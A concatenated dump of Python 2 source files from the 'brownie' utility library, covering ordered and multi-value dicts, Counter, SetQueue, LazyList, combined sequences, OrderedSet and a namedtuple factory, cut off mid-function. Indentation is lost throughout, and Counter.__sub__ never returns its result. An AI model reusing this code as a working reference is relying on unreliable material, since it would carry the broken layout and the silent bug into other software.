def update(self, *args, **kwargs):
"""
Extends the dict using the given mapping and/or keyword arguments.
"""
if len(args) > 1:
raise TypeError(
'expected at most 1 argument, got %d' % len(args)
)
mappings = [args[0] if args else [], kwargs.iteritems()]
for mapping in mappings:
for key, value in iter_multi_items(mapping):
MultiDictMixin.add(self, key, value)
class MultiDict(MultiDictMixin, dict):
"""
A :class:`MultiDict` is a dictionary customized to deal with multiple
values for the same key.
Internally the values for each key are stored as a :class:`list`, but the
standard :class:`dict` methods will only return the first value of those
:class:`list`\s. If you want to gain access to every value associated with
a key, you have to use the :class:`list` methods, specific to a
:class:`MultiDict`.
"""
__metaclass__ = AbstractClassMeta
def __repr__(self):
content = dict.__repr__(self) if self else ''
return '%s(%s)' % (self.__class__.__name__, content)
class ImmutableMultiDictMixin(ImmutableDictMixin, MultiDictMixin):
def add(self, key, value):
raise_immutable(self)
def setlist(self, key, values):
raise_immutable(self)
def setlistdefault(self, key, default_list=None):
raise_immutable(self)
def poplist(self, key):
raise_immutable(self)
def popitemlist(self):
raise_immutable(self)
class ImmutableMultiDict(ImmutableMultiDictMixin, dict):
"""
An immutable :class:`MultiDict`.
.. versionadded:: 0.5
:class:`ImmutableMultiDict` is now hashable, given the content is.
"""
__metaclass__ = AbstractClassMeta
virtual_superclasses = (MultiDict, ImmutableDict)
def __hash__(self):
return hash(tuple((key, tuple(value)) for key, value in self.lists()))
class CombinedMultiDict(CombinedDictMixin, ImmutableMultiDictMixin, dict):
"""
An :class:`ImmutableMultiDict` which combines the given `dicts` into one.
.. versionadded:: 0.2
"""
__metaclass__ = AbstractClassMeta
virtual_superclasses = (ImmutableMultiDict, )
def getlist(self, key):
return sum((d.getlist(key) for d in self.dicts), [])
def iterlists(self):
result = OrderedDict()
for d in self.dicts:
for key, values in d.iterlists():
result.setdefault(key, []).extend(values)
return result.iteritems()
def iterlistvalues(self):
for key in self:
yield self.getlist(key)
def iteritems(self, multi=False):
for key in self:
if multi:
yield key, self.getlist(key)
else:
yield key, self[key]
def items(self, multi=False):
return list(self.iteritems(multi))
class _Link(object):
__slots__ = 'key', 'prev', 'next'
def __init__(self, key=None, prev=None, next=None):
self.key = key
self.prev = prev
self.next = next
def __getstate__(self):
return self.key, self.prev, self.next
def __setstate__(self, state):
self.key, self.prev, self.next = state
class OrderedDict(dict):
"""
A :class:`dict` which remembers insertion order.
Big-O times for every operation are equal to the ones :class:`dict` has
however this comes at the cost of higher memory usage.
This dictionary is only equal to another dictionary of this type if the
items on both dictionaries were inserted in the same order.
"""
@classmethod
def fromkeys(cls, iterable, value=None):
"""
Returns a :class:`OrderedDict` with keys from the given `iterable`
and `value` as value for each item.
"""
return cls(izip(iterable, repeat(value)))
def __init__(self, *args, **kwargs):
if len(args) > 1:
raise TypeError(
'expected at most 1 argument, got %d' % len(args)
)
self._root = _Link()
self._root.prev = self._root.next = self._root
self._map = {}
OrderedDict.update(self, *args, **kwargs)
def __setitem__(self, key, value):
"""
Sets the item with the given `key` to the given `value`.
"""
if key not in self:
last = self._root.prev
link = _Link(key, last, self._root)
last.next = self._root.prev = self._map[key] = link
dict.__setitem__(self, key, value)
def __delitem__(self, key):
"""
Deletes the item with the given `key`.
"""
dict.__delitem__(self, key)
link = self._map.pop(key)
prev, next = link.prev, link.next
prev.next, next.prev = link.next, link.prev
def setdefault(self, key, default=None):
"""
Returns the value of the item with the given `key`, if not existant
sets creates an item with the `default` value.
"""
if key not in self:
OrderedDict.__setitem__(self, key, default)
return OrderedDict.__getitem__(self, key)
def pop(self, key, default=missing):
"""
Deletes the item with the given `key` and returns the value. If the
item does not exist a :exc:`KeyError` is raised unless `default` is
given.
"""
try:
value = dict.__getitem__(self, key)
del self[key]
return value
except KeyError:
if default is missing:
raise
return default
def popitem(self, last=True):
"""
Pops the last or first item from the dict depending on `last`.
"""
if not self:
raise KeyError('dict is empty')
key = (reversed(self) if last else iter(self)).next()
return key, OrderedDict.pop(self, key)
def move_to_end(self, key, last=True):
"""
Moves the item with the given `key` to the end of the dictionary if
`last` is ``True`` otherwise to the beginning.
Raises :exc:`KeyError` if no item with the given `key` exists.
.. versionadded:: 0.4
"""
if key not in self:
raise KeyError(key)
link = self._map[key]
prev, next = link.prev, link.next
prev.next, next.prev = next, prev
if last:
replacing = self._root.prev
replacing.next = self._root.prev = link
link.prev, link.next = replacing, self._root
else:
replacing = self._root.next
self._root.next = replacing.prev = link
link.prev, link.next = self._root, replacing
def update(self, *args, **kwargs):
"""
Updates the dictionary with a mapping and/or from keyword arguments.
"""
if len(args) > 1:
raise TypeError(
'expected at most 1 argument, got %d' % len(args)
)
mappings = []
if args:
if hasattr(args[0], 'iteritems'):
mappings.append(args[0].iteritems())
else:
mappings.append(args[0])
mappings.append(kwargs.iteritems())
for mapping in mappings:
for key, value in mapping:
OrderedDict.__setitem__(self, key, value)
def clear(self):
"""
Clears the contents of the dict.
"""
self._root = _Link()
self._root.prev = self._root.next = self._root
self._map.clear()
dict.clear(self)
def __eq__(self, other):
"""
Returns ``True`` if this dict is equal to the `other` one. If the
other one is a :class:`OrderedDict` as well they are only considered
equal if the insertion order is identical.
"""
if isinstance(other, self.__class__):
return all(
i1 == i2 for i1, i2 in izip(self.iteritems(), other.iteritems())
)
return dict.__eq__(self, other)
def __ne__(self, other):
return not self.__eq__(other)
def __iter__(self):
curr = self._root.next
while curr is not self._root:
yield curr.key
curr = curr.next
def __reversed__(self):
curr = self._root.prev
while curr is not self._root:
yield curr.key
curr = curr.prev
def iterkeys(self):
"""
Returns an iterator over the keys of all items in insertion order.
"""
return OrderedDict.__iter__(self)
def itervalues(self):
"""
Returns an iterator over the values of all items in insertion order.
"""
return (dict.__getitem__(self, k) for k in OrderedDict.__iter__(self))
def iteritems(self):
"""
Returns an iterator over all the items in insertion order.
"""
return izip(OrderedDict.iterkeys(self), OrderedDict.itervalues(self))
def keys(self):
"""
Returns a :class:`list` over the keys of all items in insertion order.
"""
return list(OrderedDict.iterkeys(self))
def values(self):
"""
Returns a :class:`list` over the values of all items in insertion order.
"""
return list(OrderedDict.itervalues(self))
def items(self):
"""
Returns a :class:`list` over the items in insertion order.
"""
return zip(OrderedDict.keys(self), OrderedDict.values(self))
def __repr__(self):
content = repr(self.items()) if self else ''
return '%s(%s)' % (self.__class__.__name__, content)
class ImmutableOrderedDict(ImmutableDictMixin, OrderedDict):
"""
An immutable :class:`OrderedDict`.
.. versionadded:: 0.2
.. versionadded:: 0.5
:class:`ImmutableOrderedDict` is now hashable, given the content is.
"""
__metaclass__ = AbstractClassMeta
virtual_superclasses = (ImmutableDict, )
move_to_end = raise_immutable
def __hash__(self):
return hash(tuple(self.iteritems()))
__repr__ = OrderedDict.__repr__
class OrderedMultiDict(MultiDictMixin, OrderedDict):
"""An ordered :class:`MultiDict`."""
__metaclass__ = AbstractClassMeta
virtual_superclasses = (MultiDict, )
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, ImmutableOrderedDict):
"""An immutable :class:`OrderedMultiDict`."""
__metaclass__ = AbstractClassMeta
virtual_superclasses = (ImmutableMultiDict, OrderedMultiDict)
def __repr__(self):
content = repr(self.items()) if self else ''
return '%s(%s)' % (self.__class__.__name__, content)
class FixedDict(dict):
"""
A :class:`dict` whose items can only be created or deleted not changed.
If you attempt to change an item a :exc:`KeyError` is raised.
.. versionadded:: 0.5
"""
def __setitem__(self, key, value):
if key in self:
raise KeyError('already set')
dict.__setitem__(self, key, value)
def update(self, *args, **kwargs):
if len(args) > 1:
raise TypeError(
'expected at most 1 argument, got %d' % len(args)
)
mappings = []
if args:
if hasattr(args[0], 'iteritems'):
mappings.append(args[0].iteritems())
else:
mappings.append(args[0])
mappings.append(kwargs.iteritems())
for mapping in mappings:
for key, value in mapping:
FixedDict.__setitem__(self, key, value)
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self) if self else ''
)
class Counter(dict):
"""
:class:`dict` subclass for counting hashable objects. Elements are stored
as keys with the values being their respective counts.
:param countable: An iterable of elements to be counted or a
:class:`dict`\-like object mapping elements to their
respective counts.
This object supports several operations returning a new :class:`Counter`
object from the common elements of `c1` and `c2`, in any case the new
counter will not contain negative counts.
+-------------+-----------------------------------------------------+
| Operation | Result contains... |
+=============+=====================================================+
| ``c1 + c2`` | sums of common element counts. |
+-------------+-----------------------------------------------------+
| ``c1 - c2`` | difference of common element counts. |
+-------------+-----------------------------------------------------+
| ``c1 | c2`` | maximum of common element counts. |
+-------------+-----------------------------------------------------+
| ``c1 & c2`` | minimum of common element counts. |
+-------------+-----------------------------------------------------+
Furthermore it is possible to multiply the counter with an :class:`int` as
scalar.
Accessing a non-existing element will always result in an element
count of 0, accordingly :meth:`get` uses 0 and :meth:`setdefault` uses 1 as
default value.
"""
def __init__(self, countable=None, **kwargs):
self.update(countable, **kwargs)
def __missing__(self, key):
return 0
def get(self, key, default=0):
return dict.get(self, key, default)
def setdefault(self, key, default=1):
return dict.setdefault(self, key, default)
def most_common(self, n=None):
"""
Returns a list of all items sorted from the most common to the least.
:param n: If given only the items of the `n`\-most common elements are
returned.
>>> from brownie.datastructures import Counter
>>> Counter('Hello, World!').most_common(2)
[('l', 3), ('o', 2)]
"""
if n is None:
return sorted(self.iteritems(), key=itemgetter(1), reverse=True)
return nlargest(n, self.iteritems(), key=itemgetter(1))
def elements(self):
"""
Iterator over the elements in the counter, repeating as many times as
counted.
>>> from brownie.datastructures import Counter
>>> sorted(Counter('abcabc').elements())
['a', 'a', 'b', 'b', 'c', 'c']
"""
return chain(*starmap(repeat, self.iteritems()))
def update(self, countable=None, **kwargs):
"""
Updates the counter from the given `countable` and `kwargs`.
"""
countable = countable or []
if hasattr(countable, 'iteritems'):
mappings = [countable.iteritems()]
else:
mappings = [izip(countable, repeat(1))]
mappings.append(kwargs.iteritems())
for mapping in mappings:
for element, count in mapping:
self[element] = self.get(element) + count
def __add__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
result = Counter()
for element in set(self) | set(other):
newcount = self[element] + other[element]
if newcount > 0:
result[element] = newcount
return result
def __sub__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
result = Counter()
for element in set(self) | set(other):
newcount = self[element] - other[element]
if newcount > 0:
result[element] = newcount
def __mul__(self, other):
if not isinstance(other, int):
return NotImplemented
result = Counter()
for element in self:
newcount = self[element] * other
if newcount > 0:
result[element] = newcount
return result
def __or__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
result = Counter()
for element in set(self) | set(other):
newcount = max(self[element], other[element])
if newcount > 0:
result[element] = newcount
return result
def __and__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
result = Counter()
if len(self) < len(other):
self, other = other, self
for element in ifilter(self.__contains__, other):
newcount = min(self[element], other[element])
if newcount > 0:
result[element] = newcount
return result
########NEW FILE########
__FILENAME__ = queues
# coding: utf-8
"""
brownie.datastructures.queues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import Queue as queue
class SetQueue(queue.Queue):
"""Thread-safe implementation of an ordered set queue, which coalesces
duplicate items into a single item if the older occurrence has not yet been
read and maintains the order of items in the queue.
Ordered set queues are useful when implementing data structures like
event buses or event queues where duplicate events need to be coalesced
into a single event. An example use case is the inotify API in the Linux
kernel which shares the same behaviour.
Queued items must be immutable and hashable so that they can be used as
dictionary keys or added to sets. Items must have only read-only properties
and must implement the :meth:`__hash__`, :meth:`__eq__`, and :meth:`__ne__`
methods to be hashable.
An example item class implementation follows::
class QueuedItem(object):
def __init__(self, a, b):
self._a = a
self._b = b
@property
def a(self):
return self._a
@property
def b(self):
return self._b
def _key(self):
return (self._a, self._b)
def __eq__(self, item):
return self._key() == item._key()
def __ne__(self, item):
return self._key() != item._key()
def __hash__(self):
return hash(self._key())
.. NOTE::
This ordered set queue leverages locking already present in the
:class:`queue.Queue` class redefining only internal primitives. The
order of items is maintained because the internal queue is not replaced.
An internal set is used merely to check for the existence of an item in
the queue.
.. versionadded:: 0.3
:author: Gora Khargosh <gora.khargosh@gmail.com>
:author: Lukáš Lalinský <lalinsky@gmail.com>
"""
def _init(self, maxsize):
queue.Queue._init(self, maxsize)
self._set_of_items = set()
def _put(self, item):
if item not in self._set_of_items:
queue.Queue._put(self, item)
self._set_of_items.add(item)
def _get(self):
item = queue.Queue._get(self)
self._set_of_items.remove(item)
return item
__all__ = ['SetQueue']
########NEW FILE########
__FILENAME__ = sequences
# coding: utf-8
"""
brownie.datastructures.sequences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
import textwrap
from keyword import iskeyword
from functools import wraps
from itertools import count
from brownie.itools import chain
class LazyList(object):
"""
Implements a lazy list which computes items based on the given `iterable`.
This allows you to create :class:`list`\-like objects of unlimited size.
However although most operations don't exhaust the internal iterator
completely some of them do, so if the given iterable is of unlimited size
making such an operation will eventually cause a :exc:`MemoryError`.
Cost in terms of laziness of supported operators, this does not include
supported operators without any cost:
+-----------------+-------------------------------------------------------+
| Operation | Result |
+=================+=======================================================+
| ``list[i]`` | This exhausts the `list` up until the given index. |
+-----------------+ |
| ``list[i] = x`` | |
+-----------------+ |
| ``del list[i]`` | |
+-----------------+-------------------------------------------------------+
| ``len(list)`` | Exhausts the internal iterator. |
+-----------------+-------------------------------------------------------+
| ``x in list`` | Exhausts the `list` up until `x` or until the `list` |
| | is exhausted. |
+-----------------+-------------------------------------------------------+
| ``l1 == l2`` | Exhausts both lists. |
+-----------------+-------------------------------------------------------+
| ``l1 != l2`` | Exhausts both lists. |
+-----------------+-------------------------------------------------------+
| ``bool(list)`` | Exhausts the `list` up to the first item. |
+-----------------+-------------------------------------------------------+
| ``l1 < l2`` | Exhausts the list up to the first item which shows |
| | the result. In the worst case this exhausts both |
+-----------------+ lists. |
| ``l1 > l2`` | |
+-----------------+-------------------------------------------------------+
| ``l1 + l2`` | Creates a new :class:`LazyList` without exhausting |
| | `l1` or `l2`. |
+-----------------+-------------------------------------------------------+
| ``list * n`` | Exhausts the `list`. |
+-----------------+ |
| ``list *= n`` | |
+-----------------+-------------------------------------------------------+
.. versionadded:: 0.5
It is now possible to pickle :class:`LazyList`\s, however this will
exhaust the list.
"""
@classmethod
def factory(cls, callable):
"""
Returns a wrapper for a given callable which takes the return value
of the wrapped callable and converts it into a :class:`LazyList`.
"""
@wraps(callable)
def wrap(*args, **kwargs):
return cls(callable(*args, **kwargs))
return wrap
def exhausting(func):
@wraps(func)
def wrap(self, *args, **kwargs):
self._exhaust()
return func(self, *args, **kwargs)
return wrap
def __init__(self, iterable):
if isinstance(iterable, (list, tuple, basestring)):
#: ``True`` if the internal iterator is exhausted.
self.exhausted = True
self._collected_data = list(iterable)
else:
self._iterator = iter(iterable)
self.exhausted = False
self._collected_data = []
def _exhaust(self, i=None):
if self.exhausted:
return
elif i is None or i < 0:
index_range = count(self.known_length)
elif isinstance(i, slice):
start, stop = i.start, i.stop
if start < 0 or stop < 0:
index_range = count(self.known_length)
else:
index_range = xrange(self.known_length, stop)
else:
index_range = xrange(self.known_length, i + 1)
for i in index_range:
try:
self._collected_data.append(self._iterator.next())
except StopIteration:
self.exhausted = True
break
@property
def known_length(self):
"""
The number of items which have been taken from the internal iterator.
"""
return len(self._collected_data)
def append(self, object):
"""
Appends the given `object` to the list.
"""
self.extend([object])
def extend(self, objects):
"""
Extends the list with the given `objects`.
"""
if self.exhausted:
self._collected_data.extend(objects)
else:
self._iterator = chain(self._iterator, objects)
def insert(self, index, object):
"""
Inserts the given `object` at the given `index`.
This method exhausts the internal iterator up until the given `index`.
"""
self._exhaust(index)
self._collected_data.insert(index, object)
def pop(self, index=None):
"""
Removes and returns the item at the given `index`, if no `index` is
given the last item is used.
This method exhausts the internal iterator up until the given `index`.
"""
self._exhaust(index)
if index is None:
return self._collected_data.pop()
return self._collected_data.pop(index)
def remove(self, object):
"""
Looks for the given `object` in the list and removes the first
occurrence.
If the item is not found a :exc:`ValueError` is raised.
This method exhausts the internal iterator up until the first
occurrence of the given `object` or entirely if it is not found.
"""
while True:
try:
self._collected_data.remove(object)
return
except ValueError:
if self.exhausted:
raise
else:
self._exhaust(self.known_length)
@exhausting
def reverse(self):
"""
Reverses the list.
This method exhausts the internal iterator.
"""
self._collected_data.reverse()
@exhausting
def sort(self, cmp=None, key=None, reverse=False):
"""
Sorts the list using the given `cmp` or `key` function and reverses it
if `reverse` is ``True``.
This method exhausts the internal iterator.
"""
self._collected_data.sort(cmp=cmp, key=key, reverse=reverse)
@exhausting
def count(self, object):
"""
Counts the occurrences of the given `object` in the list.
This method exhausts the internal iterator.
"""
return self._collected_data.count(object)
def index(self, object):
"""
Returns first index of the `object` in list
This method exhausts the internal iterator up until the given `object`.
"""
for i, obj in enumerate(self):
if obj == object:
return i
raise ValueError('%s not in LazyList' % object)
def __getitem__(self, i):
"""
Returns the object or objects at the given index.
This method exhausts the internal iterator up until the given index.
"""
self._exhaust(i)
return self._collected_data[i]
def __setitem__(self, i, obj):
"""
Sets the given object or objects at the given index.
This method exhausts the internal iterator up until the given index.
"""
self._exhaust(i)
self._collected_data[i] = obj
def __delitem__(self, i):
"""
Removes the item or items at the given index.
This method exhausts the internal iterator up until the given index.
"""
self._exhaust(i)
del self._collected_data[i]
@exhausting
def __len__(self):
"""
Returns the length of the list.
This method exhausts the internal iterator.
"""
return self.known_length
def __contains__(self, other):
for item in self:
if item == other:
return True
return False
@exhausting
def __eq__(self, other):
"""
Returns ``True`` if the list is equal to the given `other` list, which
may be another :class:`LazyList`, a :class:`list` or a subclass of
either.
This method exhausts the internal iterator.
"""
if isinstance(other, (self.__class__, list)):
return self._collected_data == other
return False
def __ne__(self, other):
"""
Returns ``True`` if the list is unequal to the given `other` list, which
may be another :class:`LazyList`, a :class:`list` or a subclass of
either.
This method exhausts the internal iterator.
"""
return not self.__eq__(other)
__hash__ = None
def __nonzero__(self):
"""
Returns ``True`` if the list is not empty.
This method takes one item from the internal iterator.
"""
self._exhaust(0)
return bool(self._collected_data)
def __lt__(self, other):
"""
This method returns ``True`` if this list is "lower than" the given
`other` list. This is the case if...
- this list is empty and the other is not.
- the first nth item in this list which is unequal to the
corresponding item in the other list, is lower than the corresponding
item.
If this and the other list is empty this method will return ``False``.
"""
if isinstance(other, (self.__class__, list)):
other = list(other)
return list(self) < other
def __gt__(self, other):
"""
This method returns ``True`` if this list is "greater than" the given
`other` list. This is the case if...
- this list is not empty and the other is
- the first nth item in this list which is unequal to the
corresponding item in the other list, is greater than the
corresponding item.
If this and the other list is empty this method will return ``False``.
"""
if isinstance(other, (self.__class__, list)):
other = list(other)
return list(self) > other
def __add__(self, other):
if isinstance(other, (list, self.__class__)):
return self.__class__(chain(self, other))
raise TypeError("can't concatenate with non-list: {0}".format(other))
def __iadd__(self, other):
self.extend(other)
return self
def __mul__(self, other):
if isinstance(other, int):
self._exhaust()
return self.__class__(self._collected_data * other)
raise TypeError("can't multiply sequence by non-int: {0}".format(other))
def __imul__(self, other):
if isinstance(other, int):
self._exhaust()
self._collected_data *= other
return self
else:
raise TypeError(
"can't multiply sequence by non-int: {0}".format(other)
)
@exhausting
def __getstate__(self):
return self._collected_data
def __setstate__(self, state):
self.exhausted = True
self._collected_data = state
def __repr__(self):
"""
Returns the representation string of the list, if the list exhausted
this looks like the representation of any other list, otherwise the
"lazy" part is represented by "...", like "[1, 2, 3, ...]".
"""
if self.exhausted:
return repr(self._collected_data)
elif not self._collected_data:
return '[...]'
return '[%s, ...]' % ', '.join(
repr(obj) for obj in self._collected_data
)
del exhausting
class CombinedSequence(object):
"""
A sequence combining other sequences.
.. versionadded:: 0.5
"""
def __init__(self, sequences):
self.sequences = list(sequences)
def at_index(self, index):
"""
Returns the sequence and the 'sequence local' index::
>>> foo = [1, 2, 3]
>>> bar = [4, 5, 6]
>>> cs = CombinedSequence([foo, bar])
>>> cs[3]
4
>>> cs.at_index(3)
([4, 5, 6], 0)
"""
seen = 0
if index >= 0:
for sequence in self.sequences:
if seen <= index < seen + len(sequence):
return sequence, index - seen
seen += len(sequence)
else:
for sequence in reversed(self.sequences):
if seen >= index > seen - len(sequence):
return sequence, index - seen
seen -= len(sequence)
raise IndexError(index)
def __getitem__(self, index):
if isinstance(index, slice):
return list(iter(self))[index]
sequence, index = self.at_index(index)
return sequence[index]
def __len__(self):
return sum(map(len, self.sequences))
def __iter__(self):
return chain.from_iterable(self.sequences)
def __reversed__(self):
return chain.from_iterable(reversed(map(reversed, self.sequences)))
def __eq__(self, other):
if isinstance(other, list):
return list(self) == other
elif isinstance(other, self.__class__):
return self.sequences == other.sequences
return False
def __ne__(self, other):
return not self == other
__hash__ = None
def __mul__(self, times):
if not isinstance(times, int):
return NotImplemented
return list(self) * times
def __rmul__(self, times):
if not isinstance(times, int):
return NotImplemented
return times * list(self)
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.sequences)
class CombinedList(CombinedSequence):
"""
A list combining other lists.
.. versionadded:: 0.5
"""
def count(self, item):
"""
Returns the number of occurrences of the given `item`.
"""
return sum(sequence.count(item) for sequence in self.sequences)
def index(self, item, start=None, stop=None):
"""
Returns the index of the first occurence of the given `item` between
`start` and `stop`.
"""
start = 0 if start is None else start
for index, it in enumerate(self[start:stop]):
if item == it:
return index + start
raise ValueError('%r not in list' % item)
def __setitem__(self, index, item):
if isinstance(index, slice):
start = 0 if index.start is None else index.start
stop = len(self) if index.stop is None else index.stop
step = 1 if index.step is None else index.step
for index, item in zip(range(start, stop, step), item):
self[index] = item
else:
list, index = self.at_index(index)
list[index] = item
def __delitem__(self, index):
if isinstance(index, slice):
start = 0 if index.start is None else index.start
stop = len(self) if index.stop is None else index.stop
step = 1 if index.step is None else index.step
for list, index in map(self.at_index, range(start, stop, step)):
del list[index]
else:
list, index = self.at_index(index)
del list[index]
def append(self, item):
"""
Appends the given `item` to the end of the list.
"""
self.sequences[-1].append(item)
def extend(self, items):
"""
Extends the list by appending from the given iterable.
"""
self.sequences[-1].extend(items)
def insert(self, index, item):
"""
Inserts the given `item` before the item at the given `index`.
"""
list, index = self.at_index(index)
list.insert(index, item)
def pop(self, index=-1):
"""
Removes and returns the item at the given `index`.
An :exc:`IndexError` is raised if the index is out of range.
"""
list, index = self.at_index(index)
return list.pop(index)
def remove(self, item):
"""
Removes the first occurence of the given `item` from the list.
"""
for sequence in self.sequences:
try:
return sequence.remove(item)
except ValueError:
# we may find a value in the next sequence
pass
raise ValueError('%r not in list' % item)
def _set_values(self, values):
lengths = map(len, self.sequences)
previous_length = 0
for length in lengths:
stop = previous_length + length
self[previous_length:stop] = values[previous_length:stop]
previous_length += length
def reverse(self):
"""
Reverses the list in-place::
>>> a = [1, 2, 3]
>>> b = [4, 5, 6]
>>> l = CombinedList([a, b])
>>> l.reverse()
>>> a
[6, 5, 4]
"""
self._set_values(self[::-1])
def sort(self, cmp=None, key=None, reverse=False):
"""
Sorts the list in-place, see :meth:`list.sort`.
"""
self._set_values(sorted(self, cmp, key, reverse))
def namedtuple(typename, field_names, verbose=False, rename=False, doc=None):
"""
Returns a :class:`tuple` subclass named `typename` with a limited number
of possible items who are accessible under their field name respectively.
Due to the implementation `typename` as well as all `field_names` have to
be valid python identifiers also the names used in `field_names` may not
repeat themselves.
You can solve the latter issue for `field_names` by passing ``rename=True``,
any given name which is either a keyword or a repetition is then replaced
with `_n` where `n` is an integer increasing with every rename starting by
1.
:func:`namedtuple` creates the code for the subclass and executes it
internally you can view that code by passing ``verbose==True``, which will
print the code.
Unlike :class:`tuple` a named tuple provides several methods as helpers:
.. class:: SomeNamedTuple(foo, bar)
.. classmethod:: _make(iterable)
Returns a :class:`SomeNamedTuple` populated with the items from the
given `iterable`.
.. method:: _asdict()
Returns a :class:`dict` mapping the field names to their values.
.. method:: _replace(**kwargs)
Returns a :class:`SomeNamedTuple` values replaced with the given
ones::
>>> t = SomeNamedTuple(1, 2)
>>> t._replace(bar=3)
SomeNamedTuple(foo=1, bar=3)
# doctest: DEACTIVATE
.. note::
:func:`namedtuple` is compatible with :func:`collections.namedtuple`.
.. versionadded:: 0.5
"""
def name_generator():
for i in count(1):
yield '_%d' % i
make_name = name_generator().next
if iskeyword(typename):
raise ValueError('the given typename is a keyword: %s' % typename)
if isinstance(field_names, basestring):
field_names = field_names.replace(',', ' ').split()
real_field_names = []
seen_names = set()
for name in field_names:
if iskeyword(name):
if rename:
name = make_name()
else:
raise ValueError('a given field name is a keyword: %s' % name)
elif name in seen_names:
if rename:
name = make_name()
else:
raise ValueError('a field name has been repeated: %s' % name)
real_field_names.append(name)
seen_names.add(name)
code = textwrap.dedent("""
from operator import itemgetter
class %(typename)s(tuple):
'''%(docstring)s'''
_fields = %(fields)s
@classmethod
def _make(cls, iterable):
result = tuple.__new__(cls, iterable)
if len(result) > %(field_count)d:
raise TypeError(
'expected %(field_count)d arguments, got %%d' %% len(result)
)
return result
def __new__(cls, %(fieldnames)s):
return tuple.__new__(cls, (%(fieldnames)s))
def _asdict(self):
return dict(zip(self._fields, self))
def _replace(self, **kwargs):
result = self._make(map(kwargs.pop, %(fields)s, self))
if kwargs:
raise ValueError(
'got unexpected arguments: %%r' %% kwargs.keys()
)
return result
def __getnewargs__(self):
return tuple(self)
def __repr__(self):
return '%(typename)s(%(reprtext)s)' %% self
""") % {
'typename': typename,
'fields': repr(tuple(real_field_names)),
'fieldnames': ', '.join(real_field_names),
'field_count': len(real_field_names),
'reprtext': ', '.join(name + '=%r' for name in real_field_names),
'docstring': doc or typename + '(%s)' % ', '.join(real_field_names)
}
for i, name in enumerate(real_field_names):
code += ' %s = property(itemgetter(%d))\n' % (name, i)
if verbose:
print code
namespace = {}
# there should never occur an exception here but if one does I'd rather
# have the source to see what is going on
try:
exec code in namespace
except SyntaxError, e: # pragma: no cover
raise SyntaxError(e.args[0] + ':\n' + code)
result = namespace[typename]
return result
__all__ = ['LazyList', 'CombinedSequence', 'CombinedList', 'namedtuple']
########NEW FILE########
__FILENAME__ = sets
# coding: utf-8
"""
brownie.datastructures.sets
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from functools import wraps
from brownie.itools import chain
from brownie.datastructures.mappings import OrderedDict
class OrderedSet(object):
"""
A :class:`set` which remembers insertion order.
.. versionadded:: 0.2
"""
def requires_set(func):
@wraps(func)
def wrapper(self, other):
if isinstance(other, (self.__class__, set, frozenset)):
return func(self, other)
return NotImplemented
return wrapper
def __init__(self, iterable=None):
self._orderedmap = OrderedDict.fromkeys(iterable or ())
def __len__(self):
return len(self._orderedmap)
def __contains__(self, element):
return element in self._orderedmap
def add(self, element):
self._orderedmap[element] = None
def remove(self, element):
del self._orderedmap[element]
def discard(self, element):
self._orderedmap.pop(element, None)
def pop(self, last=True):
"""
Returns the last element if `last` is ``True``, the first otherwise.
"""
if not self:
raise KeyError('set is empty')
element = self._orderedmap.popitem(last=last)[0]
return element
def clear(self):
self._orderedmap.clear()
def update(self, *others):
for other in others:
for element in other:
self._orderedmap[element] = None
def copy(self):
return self.__class__(self)
@requires_set
def __ior__(self, other):
self.update(other)
return self
def issubset(self, other):
return all(element in other for element in self)
@requires_set
def __le__(self, other):
return self.issubset(other)
@requires_set
def __lt__(self, other):
return self.issubset(other) and self != other
def issuperset(self, other):
return all(element in self for element in other)
@requires_set
def __ge__(self, other):
return self.issuperset(other)
@requires_set
def __gt__(self, other):
return self.issuperset(other) and self != other
def union(self, *others):
return self.__class__(chain.from_iterable((self, ) + others))
@requires_set
def __or__(self, other):
return self.union(other)
def intersection(self, *others):
def intersect(a, b):
result = self.__class__()
smallest = min([a, b], key=len)
for element in max([a, b], key=len):
if element in smallest:
result.add(element)
return result
return reduce(intersect, others, self)
@requires_set
def __and__(self, other):
return self.intersection(other)
@requires_set
def __iand__(self, other):
intersection = self.intersection(other)
self.clear()
self.update(intersection)
return self
def difference(self, *others):
return self.__class__(
key for key in self if not any(key in s for s in others)
)
@requires_set
def __sub__(self, other):
return self.difference(other)
@requires_set
def __isub__(self, other):
diff = self.difference(other)
self.clear()
self.update(diff)
return self
def symmetric_difference(self, other):
other = self.__class__(other)
return self.__class__(chain(self - other, other - self))
@requires_set
def __xor__(self, other):
return self.symmetric_difference(other)
@requires_set
def __ixor__(self, other):
diff = self.symmetric_difference(other)
self.clear()
self.update(diff)
return self
def __iter__(self):
return iter(self._orderedmap)
def __reversed__(self):
return reversed(self._orderedmap)
def __eq__(self, other):
if isinstance(other, self.__class__):
return len(self) == len(other) and list(self) == list(other)
return set(self) == other
def __ne__(self, other):
return not self.__eq__(other)
__hash__ = None
def __repr__(self):
content = repr(list(self)) if self else ''
return '%s(%s)' % (self.__class__.__name__, content)
del requires_set
__all__ = ['OrderedSet']
########NEW FILE########
__FILENAME__ = functional
# coding: utf-8
"""
brownie.functional
~~~~~~~~~~~~~~~~~~
Implements functions known from functional programming languages and other
things which are useful when dealing with functions.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from inspect import getargspec
from functools import wraps
from brownie.itools import izip_longest, unique
from brownie.datastructures import namedtuple, FixedDict
def compose(*functions):
"""
Returns a function which acts as a composition of several `functions`. If
one function is given it is returned if no function is given a
:exc:`TypeError` is raised.
>>> from brownie.functional import compose
>>> compose(lambda x: x + 1, lambda x: x * 2)(1)
3
.. note:: Each function (except the last one) has to take the result of the
last function as argument.
"""
if not functions:
raise TypeError('expected at least 1 argument, got 0')
elif len(functions) == 1:
return functions[0]
return reduce(lambda f, g: lambda *a, **kws: f(g(*a, **kws)), functions)
def flip(function):
"""
